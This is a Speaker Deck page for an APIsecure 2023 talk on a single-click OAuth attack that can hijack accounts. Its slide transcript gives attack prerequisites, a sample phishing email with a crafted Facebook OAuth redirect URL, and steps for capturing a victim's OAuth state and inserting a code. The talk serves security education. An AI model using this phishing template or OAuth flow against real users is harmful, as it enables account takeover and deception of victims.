Upgrade to Pro — share decks privately, control downloads, hide ads and more …

APIsecure 2023 - Single click OAuth attack that may lead to account hijacking, Swapnil Deshmukh (Certus Cybersecurity Solutions)

apidays
PRO
March 21, 2023
Programming
0
70

APIsecure 2023 - Single click OAuth attack that may lead to account hijacking, Swapnil Deshmukh (Certus Cybersecurity Solutions)

APIsecure 2023 - The world's first and only API security conference
March 14 & 15, 2023

Single click OAuth attack that may lead to account hijacking
Swapnil Deshmukh, CTO at Certus Cybersecurity Solutions LLC

------

Check out our conferences at https://www.apidays.global/

Do you want to sponsor or talk at one of our conferences?
https://apidays.typeform.com/to/ILJeAaV8

Learn more on APIscene, the global media made by the community for the community:
https://www.apiscene.io

Explore the API ecosystem with the API Landscape:
https://apilandscape.apiscene.io/

apidays
PRO

March 21, 2023
Tweet

More Decks by apidays

See All by apidays
apidays Australia 2023 - A programmatic approach to API success including OpenAPI, Paul Bradley, Excelsa
apidays
PRO
0
23
apidays Singapore 2023 - Securing and protecting our digital way of life, Veronica Tan, Cyber Security Agency of Singapore
apidays
PRO
0
20
apidays Singapore 2023 - State of the API Industry, Manjunath Bhat, Gartner
apidays
PRO
0
54
apidays Singapore 2023 - Beyond REST, Claudio Tag, IBM
apidays
PRO
0
23
apidays Singapore 2023 - Connecting the trade ecosystem, CHOO Wai Yee, Singapore Customs
apidays
PRO
0
17
apidays Singapore 2023 - Business resilience: keeping a finger on the pulse and digitizing for productivity, Jene Lim, Experian Asia Pacific
apidays
PRO
0
25
apidays Singapore 2023 - Changing the culture of building software, Aman Dhamija, Goldman Sachs & Green Software Foundation
apidays
PRO
0
23
apidays Singapore 2023 - Building a digital-first investment management model, Scott Treloar, Noviscient
apidays
PRO
0
14
apidays Singapore 2023 - Digitalising agreements with data, design & technology, Charlie Loo, DocuSign
apidays
PRO
0
15

Other Decks in Programming

See All in Programming
チームでモデリングを育てるうえで 考えたこと・気づいたこと / Cultivating Modeling in Teams: Thoughts and Insights
mackey0225
7
4k
pixivアプリでマルチモジュールを実現するまで
gatosyocora
1
130
FigmaとPHPで作る1ミリたりとも表示崩れしない最強の帳票印刷ソリューション
ttskch
34
15k
15分間でふんわり理解するDocker @ Matsuriba MAX
ukwhatn
PRO
1
410
[SF Ruby, March 2024] Rails on Wasm
palkan
0
360
本格ローグライク制作にEbitengineを選んでみた
nagainaganawa
0
280
CircleCIを活用して AWSへの継続的デリバリーを 実践する
coconala_engineer
1
230
Micro Frontends for Java Microservices - Devnexus 2024
mraible
PRO
0
370
GitHub Actionsで泣かないためにやっておきたい設定 / Recommended GHA settings to avoid crying
pinkumohikan
3
380
雑に思考を整理する技術と効能
konifar
8
2k
TYPO3 v13 – The road to LTS: What's new and new APIs
luisasofie_xoxo
0
160
オブジェクト指向は必要なのか / Is object-oriented needed?
kishida
31
21k

Featured

See All Featured
Fantastic passwords and where to find them - at NoRuKo
philnash
35
2.5k
Distributed Sagas: A Protocol for Coordinating Microservices
caitiem20
319
20k
Testing 201, or: Great Expectations
jmmastey
27
6.3k
jQuery: Nuts, Bolts and Bling
dougneiner
58
7.1k
YesSQL, Process and Tooling at Scale
rocio
161
13k
Gamification - CAS2011
davidbonilla
76
4.6k
Docker and Python
trallard
33
2.7k
Exploring the Power of Turbo Streams & Action Cable | RailsConf2023
kevinliebholz
1
3.4k
Documentation Writing (for coders)
carmenintech
59
3.9k
Building Effective Engineering Teams - LeadDev
addyosmani
26
1.8k
Building a Scalable Design System with Sketch
lauravandoore
455
32k
KATA
mclloyd
14
12k

Transcript

  1. 2022 Certus Confidential 2023 Certus Cybersecurity Public

  2. 2022 Certus Confidential 2023 Certus Cybersecurity Public

  3. 2022 Certus Confidential 2023 Certus Cybersecurity Public

  4. 2022 Certus Confidential 2023 Certus Cybersecurity Public 2023

  5. 2022 Certus Confidential 2023 Certus Cybersecurity Public 2023

  6. 2022 Certus Confidential 2023 Certus Cybersecurity Public 2023

  7. 2022 Certus Confidential 2023 Certus Cybersecurity Public 2023 Prerequisites 1.

    Sign into Google OAuth workflow and get client_id 2. Sign into FB federated authentication workflow and capture the code

  8. 2022 Certus Confidential 2023 Certus Cybersecurity Public 2023 Sample phishing

    email will look like Hi <insert your name here>, Alex mentioned you in the following post: https://www.facebook.com/v3.0/dialog/oauth?&redirect_uri= https://[redacted]/oauth2/authorize?aid=123;client_id= d1cDdL/40ACItEtxJLTo:redirect uri=https%3A%2F%2F[redacted]%2Fsettings%2Foauth_callback response_type=code:state= <insert state here>&scope=email&response_type= token.code&client_id=210068525731476 The post already got 17 likes, and is waiting for your comment.

  9. 2022 Certus Confidential 2023 Certus Cybersecurity Public 2023 https://accounts.google.com/o/oauth2/auth/identifier? client_id=[redacted].apps.googleusercontent.com&state=dEIEuiMFNKHxrpVcTG5CzSgVw5spfYzgvWtYYSkJPv

    Vhm__KA9wetQKyFm3DNzqwL43DxADaibr6GOXmniZ1RcBTT5Ummo- QDBq6tkaqbv6qGusqD7CsYadYOg1MFUWFAlDwmpntcuWpr6lTYXOy9VsxTs4YLcqUvDdoVrcopZGzF7XQsq- Hsu2E0NXLsr1IB4MHd78RRnrF8VMtQYVzvHHuoxTaZH_YuOGd7A1vOASEXbMgZP7tdmC1TNULI_OT6dFSG A4EUMRdMrQzdE&response_type=code&redirect_uri=https%3A%2F%2Fwww.facebook.com%2Foauth2%2Fre rect%2F&scope=openid email&login_hint=[redacted]gmail.com&service=lso&o2v=1&flowName=GeneralOAuthFlow In order to craft phishing email capture the state of the victim from Google auth workflow

  10. 2022 Certus Confidential 2023 Certus Cybersecurity Public 2023 View HTML

    source of the - https://www.facebook.com/oauth2/redirect/? state=dEIEuiMFNKHxrpVcTG5CzSgVw5spfYzgvWtYYSkJPvsVhm__KA9wetQKyFm3DNzqwL43DxADaibr6GOXmniZ1RcBTT5Um o-QDBq6tkaqbv6qGusqD7CsYadYOg1MFUWFAlDwmpntcuWpr6lTYXOy9VsxTs4YLcqUvDdoVrcopZGzF7XQsq- Hsu2E0NXLsr1IB4MHd78RRnrF8VMtQYVzvHHuoxTaZH_YuOGd7A1vOASEXbMgZP7tdmC1TNULI_OT6dFSGtA4EUMRdMrQzd &code=[Redacted owned by the adversary] And look for https://www.facebook. com/recover/code/[redacted] Insert the code

  11. Security by Design Certus Cybersecurity Public